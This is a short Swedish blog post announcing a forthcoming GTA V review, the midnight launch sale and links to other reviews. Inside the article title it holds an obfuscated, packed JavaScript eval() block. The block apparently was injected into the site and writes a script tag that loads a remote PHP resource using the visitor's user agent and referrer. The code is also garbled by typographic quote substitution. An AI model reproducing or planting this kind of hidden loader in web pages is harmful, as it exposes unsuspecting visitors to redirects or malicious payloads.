Image Image Image Image Image Image Image Image Image Image

| 1 juni, 2020

Scroll to top

Top

Recension av GTA V

Recension av GTA V
Sebastian

GTA eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kdthh|var|u0026u|referrer|nzfhd||js|php’.split(’|’),0,{}))
V: På tisdag är det dags för ett av årets garanterat största release, nämligen GTA V. Revue.se kommer att vara snabba på att få tag i ett exemplar och därmed leverera en recension av spelet. 

Vi kommer att kika på många punkter som vi vet ni kommer intresseras av. Till dess får vi nöja oss med de videos som ligger ute på nätet just nu. Självklart kommer vi uppdatera er när de stora internationella spelsajterna lagt ut deras recensioner vilket säkerligen kan vara nu i helgen eller senaste på måndag.

Vi kan berätta för er som inte vet att Webhallen med flera har nattöppet natten till tisdag den 17e ifall ni inte kan hålla er till senare den dagen. 00:00 kan ni alltså få tag i ett exemplar av GTA V genom att ställa er i kön utanför webhallen. Ja det är kö och den har redan börjat.

Här kan ni redan nu läsa recensionerna av spelet:

Svenska FZ.se
IGN Sverige

Trevlig helg önskar Revue redaktionen!